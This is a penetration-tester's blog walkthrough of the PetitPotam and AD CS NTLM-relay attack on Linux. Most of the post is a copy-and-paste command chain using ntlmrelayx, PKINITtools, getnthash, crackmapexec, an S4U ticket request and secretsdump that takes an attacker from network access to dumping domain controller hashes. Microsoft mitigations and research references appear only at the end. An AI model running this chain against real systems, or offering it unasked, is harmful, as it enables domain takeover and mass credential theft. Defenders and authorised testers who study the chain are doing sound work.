PetitPotam and ADCS exploitation are nothing short of amazing. Exploitation is a breeze and results in full domain admin access.

With these two TTPs, an attacker can hop on a network, exploit the vulnerability, do some command-line magic and have local administrator privileges on a domain controller in under 15 minutes. So far, no one has detailed the exploitation process fully on Linux and that’s what we’re going to do today.

Detecting the Vulnerability

Collect the following information to exploit this vulnerability:

Once you have the above information, first test that one of the domain controllers is vulnerable to PetitPotam:

PetitPotam Test 1

If it is, awesome. Let’s push on to next steps.

Getting impacket

Once the vulnerability is confirmed, clone ExAdndroidDev’s fork of Impacket and switch to the correct branch:

git clone https://github.com/ExAndroidDev/impacket && \
cd impacket && \
git checkout ntlmrelayx-adcs-attack && \
pipenv --python 3 shell

Once in the virtual environment with the correct branch, install Impacket:

python3 setup.py install

Getting ntlmrelayx up and running

You can now execute the following command to start listening for inbound authentication attempts from the domain controller targeted with PetitPotam:

python3 examples/ntlmrelayx.py -debug -smb2support --target http://10.196.1.20/certsrv/default.asp --template DomainController --adcs

Hit enter and you should see something similar to this:

PetitPotam - Listening for Inbound Authentication

Getting the PFX

Execute PetitPotam again and you’ll receive a request inbound to ntlmrelayx and generate a base64 encoded PFX blob:

PetitPotam Receive An Inbound Request

Copy the base64 output to a file for later use.

Installing PKINITtools

We need to now clone and install DirkJam’s PKINITtools:

git clone https://github.com/dirkjanm/PKINITtools && \
cd PKINITtools && \
pipenv --python 3 shell

After the python virtual environment is initialized, execute the following command to install the required packages:

pip3 install -r requirements.txt

Decoding the certificate

Using the Base64 blob you wrote to a file, decode its contents and write it to a separate file using a command similar to the one below:

cat crt.pfx.b64 | base64 -d > crt.pfx

We have to do this by hand, even though DirkJam’s tooling appears to support Base64 PFX files. That’s because we had issues with the functionality while using gettgtpkinit.py. It may work for you, though. Try it out.

Using gettgtpkinit.py

Using the DirkJam tool gettgtpkinit.py, get your TGT:

python3 gettgtpkinit.py acme.org/DC01\$ -cert-pfx crt.pfx out.ccache

You need the following for the command to work:

  • The internal domain name (acme.org)
  • The hostname of the DC you triggered authentication with using PetitPotam. Don’t forget to escape the $ with a backslash
  • Decoded version of the Base64 PFX you just generated with ntlmrelayx

Following the execution of the command below, you’ll see output similar to what is shown below and also receive TGT output to the ccache file specified earlier:

Revieve TGT Output

Getting the NT hash

Save this output and ccache file. We’ll use it to access the domain controller we attacked. Execute the following command to get the NT hash for the domain controller:

KRB5CCNAME=out.ccache python3 getnthash.py acme.org/DC01\$ -key 6e63333c372d7fbe64dab63f36673d0cd03bfb92b2a6c96e70070be7cb07f773

You need the following for the command to work:

  • The internal domain name (acme.org)
  • The hostname of the DC you triggered authentication with using PetitPotam. Don’t forget to escape the $
  • The generated AS-REP key you got from gettgtpkinit.py
  • The generated TGT ccache file you got from gettgtpkinit.py

After you hit enter, you’ll pull the NT hash for the target domain controller:

Impacket - Target Domain Controller

This is awesome because we can now authenticate to the domain, but we still want to be able to impersonate domain administrators and perform other attacks. Let’s get a silver ticket.

Finding a user to impersonate

First, let’s grab a list of administrator users using the hash above and crackmapexec:

crackmapexec ldap DC01.acme.org -u DC01\$ -H 2cf2e96d892263276b95861017e2ce27 --admin-count

You need the following for the command to work:

  • The NT hash you just extracted
  • The hostname of the domain controller you’re targeting
  • Crackmapexec installed

Following the execution of this command, you’ll now have a list of users and groups with administrative permissions in the domain. One of the accounts in our output is listed below:

  • VeeamBackup

Silver Surfing

This user most likely has local administrator access to the domain controllers and all other servers on the network. Let’s get a silver ticket for this user and start authenticating to services.

DirkJam’s command for doing this is quite long, so I’ve included it below for easy copy and paste:

KRB5CCNAME=out.ccache python3 gets4uticket.py kerberos+ccache://acme.org\\DC01\$:out.ccache@DC01.acme.org cifs/DC01.acme.org@acme.org VeeamBackup@acme.org VeeamBackup.ccache -v

Note that you need the following for the command to work:

  • The hostname of the domain controller you’re targeting
  • The generated ccache file you got from gettgtpkinit.py
  • A user to target and pull a silver ticket for
  • The internal domain name

Getting everything

After executing this command, you’ll now have a ccache file for the account VeeamBackup. you can use that ccache file to authenticate to the same domain controller as a local administrator. For example, you can execute secretsdump now:

KRB5CCNAME=VeeamBackup.ccache python3 examples/secretsdump.py -just-dc-ntlm -user-status -debug -k acme.org/VeeamBackup@DC01.acme.org -no-pass -outputfile DC01.acme.org.secretsdump

Wrap up

When this is all said and done, you get domain admin in 20 minutes or less. This is beyond devastating and honestly the biggest exploitation path since ETERNALBLUE in our opinion.

We’ve already used this TTP on engagements, and I can tell you right now, it basically feels like cheating.

Make sure to use this article to exploit and report on these vulnerabilities as soon as possible. Let your customers know the risk and ensure they understand the speed in which you were able to take over their network.

To mitigate these vulnerabilities, instate the following controls:

  • Implement LDAP signing and channel binding wherever possible
  • Enable EPA for Certificate Authority Web Enrollment in IIS on internal certificate authority servers
  • Enable EPA for Certificate Enrollment Web Service in IIS on internal certificate authority servers
  • Disable NTLM Authentication on your Windows domain controller (pipe dream, we know)
  • Disable NTLM for Internet Information Services (IIS) on AD CS Servers in your domain running the “Certificate Authority Web Enrollment” or “Certificate Enrollment Web Service” services.

These recommendations come from Microsoft and will stop this attack dead in its tracks.

Shout-outs and references

A lot of this article was cribbed from the work done by DirkJam. See more in the article below:

NTLM relaying to AD CS - On certificates, printers and a little hippo
I did not expect NTLM relaying to be a big topic again in the summer of 2021, but among printing nightmares and bad ACLs on registry hives, there has been quite some discussion around this topic again.

https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/

ExAndroidDev’s fork of Impacket is a pivotal part of this attack, and they laid the groundwork for most of the ADCS exploitation paths out now:

AD CS relay attack - practical guide
Unless you are living under the rock, you have seen that recently @harmj0y and @tifkin_ published their amazing research on Active Directory Certificate Services (AD CS). If you haven't checked it out already read their post first. While reading their research, one specific

https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/

Remediation recommendations are taken straight from the horse’s mouth (Microsoft):

KB5005413: Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS)
Microsoft is aware of PetitPotam which can potentially be used to attack Windows domain controllers or other Windows servers. PetitPotam is a classic NTLM Relay Attack, and such attacks have been previously documented by Microsoft along with numerous mitigation options to protect customers.

https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429

Of course we can’t forget the work from SpectreOps on ADCS:

Certified Pre-Owned
TL;DR Active Directory Certificate Services has a lot of attack potential! Check out our whitepaper " Certified Pre-Owned: Abusing Active Directory Certificate Services " for complete details. We're also presenting this material at Black Hat USA 2021.

https://posts.specterops.io/certified-pre-owned-d95910965cd2